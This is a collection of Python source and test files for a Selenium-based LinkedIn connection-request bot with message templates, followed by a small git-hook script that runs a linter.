{'file': path})
with open(path, 'r') as templ_file:
message = templ_file.read()
return message[message.find(TEMPL_BEGN_BLK)+len(TEMPL_BEGN_BLK):message.find(TEMPL_END_BLK):]
def load_variable(self: Template, path: str) -> str:
if self.check_if_file_is_supported(path) is False:
raise TemplateFileNotSupportedException(
'Template file %(file)s is not supported!' %
{'file': path})
with open(path, 'r') as templ_file:
variables = templ_file.read()
variables = variables[variables.find(VAR_BEGN_BLK)+len(VAR_BEGN_BLK):variables.find(VAR_END_BLK):]
variables = variables.split('\n')
for var in variables:
if var == '':
continue
var_, val = var.split('=')
var_ = var_.strip()
if var_ in MY_NAMES:
self._data = {**self._data, **{var_: val.strip()}}
else:
raise TemplateFileException(
f"Variables other than {MY_NAMES} are not currently supported, you gave {var_}!")
def parse(self: Template) -> str:
def common_connection_request_random_choice() -> str:
with open(TEMPL_FILE_PATH, 'r') as file:
data = json.load(file)
message = random.choice(data['template_common_connection_request'])
return message
def check_if_templ_variable_missing(var: str) -> bool:
nonlocal self
return var in self._data and self._data[var] is None and self._message.find(var) > -1
message = self._message
for var in OTHERS:
if var in self._data and self._data[var]:
message = self._message.replace(var, self._data[var])
elif check_if_templ_variable_missing(var):
message = common_connection_request_random_choice()
return self.parse()
if self._enable_language_tool:
message = self._language_tool.correct(message)
for var in NAMES:
if var in self._data and self._data[var]:
message = self._message.replace(var, self._data[var])
elif check_if_templ_variable_missing(var):
message = common_connection_request_random_choice()
return self.parse()
return message
def read(self: Template) -> str:
message = self.parse()
if len(message) > 300:
raise TemplateMessageLengthExceededException(
'Personalized message length cannot exceed by 300, you gave %(characters)s characters'
% {'characters': len(message)})
return message
```
#### File: linkedin/person/__init__.py
```python
from __future__ import annotations
import re
import sys
import json
import nameparser
from typing import (
Union,
TextIO,
)
from selenium import webdriver
class Path_To_Element_By(object):
SUGGESTION_BOX_ELEMENT_XPATH = '/html/body/div[6]/div[3]/div/div/div/div/div[2]/div/div/main/div[3]/section/section/section/div/ul/li[1]'
SEARCH_RESULTS_PEOPLE_XPATH_PRM = '//*[@id="main"]/div/div/div[2]/ul/li[1]'
SEARCH_RESULTS_PEOPLE_XPATH_SEC = '//*[@id="main"]/div/div/div[3]/ul/li[1]'
class Person_Info(object):
"""Class Person_Info provides an object with person's necessary details fetched
from linkedin's page.
"""
def __init__(
self: Person_Info, *, name: str = None, occupation: str = None,
profile_url: str = None, photo_url: str = None,
location: str = None, summary: str = None,
connect_button: webdriver.Chrome = None) -> None:
"""Constructor method initializes the Person_Info object with basic details
about the person.
:Args:
- self: {Person_Info} self.
- name: {str} person's name.
- occupation: {str} person's occupation.
- profile_url: {str} person's linkedin profile url.
- photo_url: {str} person's linkedin profile photo url.
- connect_button: {webdriver.Chrome} person's connect button instance.
"""
self.name = name
name_ = nameparser.HumanName(self.name)
self.first_name = name_.first
self.last_name = name_.last
self.occupation = occupation
self.profile_url = profile_url
if "?" in photo_url:
self.photo_url = photo_url.split("?")[0]
else:
self.photo_url = photo_url
self.connect_button = connect_button
self.location = location
self.summary = summary
self.id = self.person_id()
def person_id(self: Person_Info) -> str:
"""Method person_id() returns the person id filtering the person's profile url.
:Args:
- self: {Person_Info} self.
:Returns:
- {str} person id.
"""
_re = re.compile(r"([a-z]+-?)+([a-zA-Z0-9]+)?", re.IGNORECASE)
return _re.search(self.profile_url)
def freeze(
self: Person_Info,
file: Union[str, TextIO] = sys.stdout,
mode: str = "w",
_format: str = None
) -> None:
"""Method freeze() dumps the current object state in the given file in the given format.
:Args:
- self: {Person_Info} self.
- file: {Union[str, TextIO]} file to dump the current object state in.
- mode: {str} in what mode to open the file in.
- _format: {str} in what format to write the data in.
:Raises:
- {Exception} if the format and the file is not identified.
"""
message = ''
if _format == "json":
message = json.dump({
"name": self.name,
"person_id": self._person_id,
"occupation": self.occupation,
"profile_url": self.profile_url,
"photo_url": self.photo_url,
"location": self.location,
"summary": self.summary
})
elif _format == "raw":
message = ("name: %(name)s\n" +
"person_id: %(person_id)s\n" +
"occupation: %(occupation)s\n" +
"profile_url: %(profile_url)s\n" +
"photo_url: %(photo_url)s\m" +
"location: %(location)s\n" +
"summary: %(summary)s") % {
"name": self.name,
"person_id": self._person_id,
"occupation": self.occupation,
"profile_url": self.profile_url,
"photo_url": self.photo_url,
"location": self.location,
"summary": self.summary}
else:
raise Exception("Format '%(frmt)s' is not supported!" %
{"frmt": _format})
if isinstance(file, str):
with open(file=file, mode=mode) as file:
if file.endswith(".json"):
json.dump(message, file, indent=2)
else:
file.write(message)
return
elif file == sys.stdout:
file.write(message)
else:
raise Exception("File '%(file)s' is not supported!" %
{"file": file})
```
#### File: test_lib/test_utils/test_figlet.py
```python
from __future__ import annotations
import unittest
from unittest.mock import Mock
from unittest.mock import patch
from lib.utils.figlet import CreateFigletString
class TestCreateFigletFunction(unittest.TestCase):
@patch("pyfiglet.figlet_format")
def test_createfigletstring_function_with_one_parameter(
self: TestCreateFigletFunction,
mock_figlet_format: Mock
) -> None:
kwargs = {}
CreateFigletString("inb")
mock_figlet_format.assert_called_with(
text="inb", font="standard", **kwargs)
@patch("pyfiglet.figlet_format")
def test_createfigletstring_function_with_two_parameters(
self: TestCreateFigletFunction,
mock_figlet_format: Mock
) -> None:
kwargs = {}
CreateFigletString("inb", font="slant")
mock_figlet_format.assert_called_with(
text="inb", font="slant", **kwargs)
```
#### File: test_lib/test_utils/test_validator.py
```python
from __future__ import annotations
import os
import stat
import unittest
from lib import DRIVER_PATH
from lib.utils.validator import Validator
class TestValidatorClass(unittest.TestCase):
def test_validator_error_code(self: TestValidatorClass) -> None:
self.assertEqual(Validator.ERROR_INVALID_NAME, 123)
def test_validator_constructor_exception(
self: TestValidatorClass) -> None:
different_types = [10, 10.19, [1, 2, 3, 4],
["abc", "bcd", "cdb"], {"name": "ayush"}]
for i in range(len(different_types)):
with self.assertRaises(ValueError):
Validator(different_types[i])
def test_validator_constructor(self: TestValidatorClass) -> None:
validator = Validator("https://www.linkedin.com/")
self.assertEqual(validator._field, "https://www.linkedin.com/")
def test_validator_is_url_method(self: TestValidatorClass) -> None:
self.assertTrue(Validator("http://www.linkedin.com/").is_url())
self.assertTrue(Validator("https://www.linkedin.com/").is_url())
self.assertTrue(Validator("ftp://www.linkedin.com/").is_url())
self.assertTrue(Validator("ftps://www.linkedin.com/").is_url())
self.assertTrue(Validator(
"https://www.linkedin.com/in/ornela-cerenishti-118400146/").is_url())
self.assertFalse(Validator("notavalidurl").is_url())
self.assertFalse(
Validator("/ornela-cerenishti-118400146/").is_url())
def test_validator_is_email_method(
self: TestValidatorClass) -> None:
self.assertTrue(Validator("<EMAIL>").is_email())
self.assertTrue(
Validator("<EMAIL>").is_email())
self.assertTrue(
Validator("<EMAIL>").is_email())
self.assertTrue(
Validator("<EMAIL>").is_email())
self.assertTrue(
Validator("<EMAIL>").is_email())
self.assertTrue(
Validator("<EMAIL>").is_email())
self.assertTrue(
Validator("<EMAIL>").is_email())
self.assertFalse(Validator("@gmail.com").is_email())
self.assertFalse(Validator(".com@gmail").is_email())
def test_validator_is_path_method(self: TestValidatorClass) -> None:
self.assertTrue(Validator(os.path.abspath(__file__)).is_path())
@unittest.skipIf(not os.getuid() == 0,
"Cannot alter permissions without root!")
def test_validator_is_executable_method(
self: TestValidatorClass) -> None:
original_file_permissions = stat.S_IMODE(
os.lstat(DRIVER_PATH).st_mode)
def add_execute_permissions(path):
"""Add write permissions from this path, while keeping all other
permissions intact.
Params:
path: The path whose permissions to alter.
"""
ADD_USER_EXECUTE = stat.S_IXUSR
ADD_GROUP_EXECUTE = stat.S_IXGRP
ADD_OTHER_EXECUTE = stat.S_IXOTH
ADD_EXECUTE = ADD_USER_EXECUTE | ADD_GROUP_EXECUTE | ADD_OTHER_EXECUTE
current_permissions = stat.S_IMODE(os.lstat(path).st_mode)
os.chmod(path, current_permissions | ADD_EXECUTE)
add_execute_permissions(DRIVER_PATH)
self.assertTrue(Validator(DRIVER_PATH).is_executable())
def remove_execute_permissions(path):
"""Remove write permissions from this path, while keeping all other
permissions intact.
Params:
path: The path whose permissions to alter.
"""
NO_USER_EXECUTE = ~stat.S_IXUSR
NO_GROUP_EXECUTE = ~stat.S_IXGRP
NO_OTHER_EXECUTE = ~stat.S_IXOTH
NO_EXECUTE = NO_USER_EXECUTE & NO_GROUP_EXECUTE & NO_OTHER_EXECUTE
current_permissions = stat.S_IMODE(os.lstat(path).st_mode)
os.chmod(path, current_permissions & NO_EXECUTE)
remove_execute_permissions(DRIVER_PATH)
self.assertFalse(Validator(DRIVER_PATH).is_executable())
# place the original file permissions back
os.chmod(DRIVER_PATH, original_file_permissions)
```
#### File: test_lib/test_utils/test_window.py
```python
from __future__ import annotations
import unittest
from unittest.mock import Mock
from unittest.mock import patch
from lib import Terminal
class TestTerminalClass(unittest.TestCase):
def setUp(self: TestTerminalClass) -> None:
self.t = Terminal()
@patch("sys.stdout.write")
def test_setcursorposition_method_with_valid_x_and_y(
self: TestTerminalClass, mock_stdout_write: Mock) -> None:
self.t.setcursorposition(10, 10)
mock_stdout_write.assert_called_with("%c[%d;%df" % (0x1B, 10, 10))
def test_getcursorposition_method(self: TestTerminalClass) -> None:
(x, y) = self.t.getcursorposition()
self.assertIsInstance(x, int)
self.assertIsInstance(y, int)
```
#### File: test_linkedin/connect/test_linkedinsearchconnect.py
```python
from __future__ import annotations
import os
import json
import unittest
from unittest.mock import Mock
from unittest.mock import patch
from lib import ping
from errors import ConnectionLimitExceededException
from linkedin import Driver
from linkedin.DOM import JS
from linkedin.login import LinkedIn
from linkedin.connect import LinkedInSearchConnect
@unittest.skipUnless(ping("linkedin.com"),
"linkedin.com server not responding")
class TestLinkedInSearchConnectClass(unittest.TestCase):
def setUp(self: TestLinkedInSearchConnectClass) -> None:
creds_abspath_ = os.path.dirname(
os.path.abspath(__file__)) + "/../../creds/creds.json"
with open(creds_abspath_, "r") as f:
data = json.load(f)
chrome_driver_options = []
chrome_driver_options.append(Driver.HEADLESS)
chrome_driver_options.append(
Driver.DEFAULT_HEADLESS_WINDOW_SIZE)
self.linkedin = LinkedIn(
user_email=data["user_email"],
user_password=data["<PASSWORD>"],
driver_path=data["driver_path"],
opt_chromedriver_options=chrome_driver_options)
def test_constructor_method_with_invalid_driver_instance_type(
self: TestLinkedInSearchConnectClass) -> None:
invalid_objs = [
1, "ayush", [1, 2, 3, 4],
{1: "ayush", 2: "mohika"}]
for obj in invalid_objs:
with self.assertRaises(TypeError):
linkedinsearchconnect = LinkedInSearchConnect(obj)
def test_contructor_method_with_invalid_limit_number(
self: TestLinkedInSearchConnectClass) -> None:
with self.assertRaises(ConnectionLimitExceededException):
linkedinsearchconnect = LinkedInSearchConnect(
self.linkedin.driver, limit=100)
@patch("linkedin.DOM.JS.scroll_bottom")
@patch("linkedin.DOM.JS.get_page_y_offset")
def test_private_method_scroll(self: TestLinkedInSearchConnectClass,
mock_js_get_page_y_offset: Mock,
mock_js_scroll_bottom: Mock) -> None:
linkedinsearchconnect = LinkedInSearchConnect(
self.linkedin.driver)
linkedinsearchconnect._scroll()
mock_js_get_page_y_offset.assert_called()
mock_js_scroll_bottom.assert_called()
```
#### File: test_linkedin/message/test_template.py
```python
from __future__ import annotations
import unittest
from errors import TemplateFileException
from linkedin.message import Template
Template_Business = """Hi {{name}},
I'm looking to expand my network with fellow business owners and professionals. I would love to learn about what you do and see
if there's any way we can support each other.
Cheers!"""
Template_Sales = """Hi {{name}},
I'm looking to connect with like-minded professionals specifically who are on the revenue generating side of things.
Let's connect!"""
Template_Real_Estate = """Hey {{name}},
Came across your profile and saw your work in real estate. I'm reaching out to connect with other like-minded people. Would be
happy to make your acquaintance.
Have a good day!"""
Template_Creative_Industry = """Hi {{name}},
LinkedIn showed me your profile multiple times now, so I checked what you do. I really like your work and as we are both in the
creative industy - I thought I'll reach out. It's always great to be connected with like-minded individuals, isn't it?
{{my_name}}"""
Template_Hr = """Hey {{name}},
I hope your week is off to a great start, I noticed we both work in the HR/Employee Experience field together.
I would love to connect with you."""
Template_Include_Industry = """Hi {{name}},
I hope you're doing great! I'm on a personal mission to grow my connections on LinkedIn, especially in the field of {{industry}}.
So even though we're practically strangers, I'd love to connect with you.
Have a great day!"""
Template_Ben_Franklin = """Hi {{name}},
The Ben Franklin effect - when we do a person a favor, we tend to like them more as a result. Anything I can do for you?
Best, {{my_name}}"""
Template_Virtual_Coffee = """Hi {{name}},
I hope you're doing well. I'm {{my_name}}, {{my_position}} of {{my_company_name}}. We're looking for {{position}} and it would be
great to connect over a 'virtual' coffee/chat and see what we can do together?"""
Template_Common_Connection_Request = [
"""Hey {{name}},
I notice we share a mutual connection or two & would love to add you to my network of professionals.
If you're open to that let's connect!""",
"""Hi {{name}},
I see we have some mutual connections. I always like networking with new people, and thought this would be an easy way for us to
introduce ourselves.""",
"""Hi {{name}},
Life is both long and short. We have quite a few mutual connections. I would like to invite you to join my network on LinkedIn
platform. Hopefully, our paths will cross professionally down the line. Until then, wishing you and yours an incredible {{year}}.
{{my_name}}""",
"""Hi {{name}},
I was looking at your profile and noticed we had a few shared connections. I thought it would be nice to reach out to connect with
you and share out networks.
Thank you and hope all is well!""",
"""Hey {{first_name}},
I saw you're based in {{location}} and work on {{keyword}}, I'd love to connect.
Thanks, {{my_name}}"""
]
class TestTemplateApi(unittest.TestCase):
def test_static_method_get_template_by_name(
self: TestTemplateApi) -> None:
template = Template(
None, var_template=None, grammar_check=False,
use_template='template_ben_franklin')
self.assertEqual(template.get_template_by_name(
'template_ben_franklin'), Template_Ben_Franklin)
self.assertEqual(template.get_template_by_name(
'template_business'), Template_Business)
self.assertEqual(template.get_template_by_name(
'template_sales'), Template_Sales)
self.assertEqual(template.get_template_by_name(
'template_real_estate'), Template_Real_Estate)
self.assertEqual(template.get_template_by_name(
'template_creative_industry'),
Template_Creative_Industry)
self.assertEqual(
template.get_template_by_name('template_hr'),
Template_Hr)
self.assertEqual(template.get_template_by_name(
'template_include_industry'),
Template_Include_Industry)
self.assertEqual(template.get_template_by_name(
'template_virtual_coffee'), Template_Virtual_Coffee)
for i in range(5):
self.assertEqual(
template.get_template_by_name(
'template_common_connection_request')[i],
Template_Common_Connection_Request[i])
with self.assertRaises(TemplateFileException):
template.get_template_by_name('any_unknown_template')
def test_method_parse_with_template_business(
self: TestTemplateApi) -> None:
template = Template(None, var_template=None,
use_template='template_business',
grammar_check=False)
template.set_data({
'name': 'Ayush',
})
template_business = Template_Business.replace(
'{{name}}', 'Ayush')
self.assertEqual(template.parse(), template_business)
```
#### File: tests/test_linkedin/test_driver.py
```python
from __future__ import annotations
import os
import stat
import unittest
from unittest.mock import call
from unittest.mock import Mock
from unittest.mock import patch
from linkedin import Driver
from lib import DRIVER_PATH
from errors import WebDriverPathNotGivenException
from errors import WebDriverNotExecutableException
class TestDriverClass(unittest.TestCase):
@unittest.skipIf(not os.getuid() == 0, "Requires root privileges!")
def test_constructor_method_with_invalid_executable_path(
self: TestDriverClass) -> None:
paths = [1, (1, 2, 3), [1, 2, 3], {1: 1, 2: 2}]
for path in paths:
with self.assertRaises(WebDriverPathNotGivenException):
driver = Driver(path)
original_file_permissions = stat.S_IMODE(
os.lstat(DRIVER_PATH).st_mode)
def remove_execute_permissions(path):
"""Remove write permissions from this path, while keeping all other
permissions intact.
Params:
path: The path whose permissions to alter.
"""
NO_USER_EXECUTE = ~stat.S_IXUSR
NO_GROUP_EXECUTE = ~stat.S_IXGRP
NO_OTHER_EXECUTE = ~stat.S_IXOTH
NO_EXECUTE = NO_USER_EXECUTE & NO_GROUP_EXECUTE & NO_OTHER_EXECUTE
current_permissions = stat.S_IMODE(os.lstat(path).st_mode)
os.chmod(path, current_permissions & NO_EXECUTE)
remove_execute_permissions(DRIVER_PATH)
with self.assertRaises(WebDriverNotExecutableException):
driver = Driver(driver_path=DRIVER_PATH)
# place the original file permissions back
os.chmod(DRIVER_PATH, original_file_permissions)
@patch("linkedin.Driver.enable_webdriver_chrome")
def test_constructor_method_with_valid_chromedriver_path(self: TestDriverClass, mock_enable_webdriver_chrome: Mock) -> None:
driver = Driver(driver_path=DRIVER_PATH)
mock_enable_webdriver_chrome.assert_called()
@patch("selenium.webdriver.ChromeOptions.add_argument")
def test_constructor_method_add_argument_internal_calls(
self: TestDriverClass, mock_add_argument: Mock) -> None:
calls = [
call(Driver.HEADLESS),
call(Driver.INCOGNITO),
call(Driver.NO_SANDBOX),
call(Driver.DISABLE_GPU),
call(Driver.START_MAXIMIZED),
call(Driver.DISABLE_INFOBARS),
call(Driver.ENABLE_AUTOMATION),
call(Driver.DISABLE_EXTENSIONS),
call(Driver.DISABLE_NOTIFICATIONS),
call(Driver.DISABLE_SETUID_SANDBOX),
call(Driver.IGNORE_CERTIFICATE_ERRORS)]
driver = Driver(driver_path=DRIVER_PATH, options=[
Driver.HEADLESS, Driver.INCOGNITO, Driver.NO_SANDBOX, Driver.DISABLE_GPU, Driver.START_MAXIMIZED,
Driver.DISABLE_INFOBARS, Driver.ENABLE_AUTOMATION, Driver.DISABLE_EXTENSIONS, Driver.DISABLE_NOTIFICATIONS,
Driver.DISABLE_SETUID_SANDBOX, Driver.IGNORE_CERTIFICATE_ERRORS])
mock_add_argument.assert_has_calls(calls)
``` |
{
"source": "joshi-bharat/linter",
"score": 3
} |
#### File: joshi-bharat/linter/git_hooks.py
```python
from __future__ import print_function
import os
import subprocess
import sys
def run_command_in_folder(command, folder):
"""Run a bash command in a specific folder."""
run_command = subprocess.Popen(command,
shell=True,
cwd=folder,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE)
stdout, _ = run_command.communicate()
command_output = stdout.rstrip()
return command_output
def get_git_repo_root(some_folder_in_root_repo='./'):
"""Get the root folder of the current git repository."""
return run_command_in_folder('git rev-parse --show-toplevel',
some_folder_in_root_repo)
def get_linter_folder(root_repo_folder):
"""Find the folder where this linter is stored."""
try:
return os.environ['LINTER_PATH']
except KeyError:
print("Cannot find linter because the environment variable "
"LINTER_PATH doesn't exist.")
sys.exit(1)
def main():
# Get git root folder.
repo_root = get_git_repo_root()
# Get linter subfolder
linter_folder = get_linter_folder(repo_root)
# Append linter folder to the path so that we can import the linter module.
linter_folder = os.path.join(repo_root, linter_folder)
sys.path.append(linter_folder)
import linter
linter.linter_check(repo_root, linter_folder)
if __name__ == "__main__":
main()
``` |
Subsets and Splits
No saved queries yet
Save your SQL queries to embed, download, and access them later. Queries will appear here once saved.